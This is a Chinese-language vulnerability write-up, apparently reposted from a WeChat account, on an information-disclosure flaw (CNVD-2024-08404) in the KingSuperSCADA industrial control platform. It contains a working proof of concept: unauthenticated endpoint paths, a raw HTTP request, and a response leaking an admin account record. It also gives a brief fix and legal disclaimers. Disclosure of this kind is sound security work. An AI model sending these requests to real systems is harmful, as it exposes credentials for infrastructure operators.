本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
漏洞说明
KingSuperSCADA是一款全组态型监控平台软件,适用于能源、水利、军工、电力、市政等全工业领域。具有自主研发、安全可控、稳定可靠、分布式部署、架构灵活、性能卓越等的产品特性,致力于保障国家公共安全和工业信息化安全。此外,它还是热网、燃气、油田、地铁等行业的巨型SCADA监控平台,致力于解决分布式采集难、大规模时效性和可靠性差等问题
KingSuperSCADA存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。
影响版本
KingSuperSCADA
漏洞复现
payload:
/user.json
/file/getMainConfigProject
.....
请求包:
GET /user.json HTTP/1.1
Host: host
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Length: 2
响应包:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type,Content-Length,Authorizaiton,Accept,X-Requested-With
Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
Content-Type: application/json
Expires: Tue, 27 Feb 2024 01:26:06 GMT
Cache-Control: max-age=1
Last-Modified: Thu, 01 Feb 2024 03:17:45 GMT
Vary: Accept-Encoding
Date: Tue, 27 Feb 2024 01:26:05 GMT
Connection: keep-alive
Content-Length: 11401
{
"KingAdmin": {
"name": "KingAdmin",
"nickname": "",
"id": "R19NKuFcmb4w5u0O",
"jobNum": "t19NKuFcBa2H15yX",
"isAdmin": false,
"description": "",
"password": "xxxxxxxxx",
.....
修复建议
严格检查接口权限配置,禁止未授权访问
本文章仅用于学习交流,不得用于非法用途
原文始发于微信公众号(才疏学浅的H6):KingSuperSCADA信息泄露 | CNVD-2024-08404
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论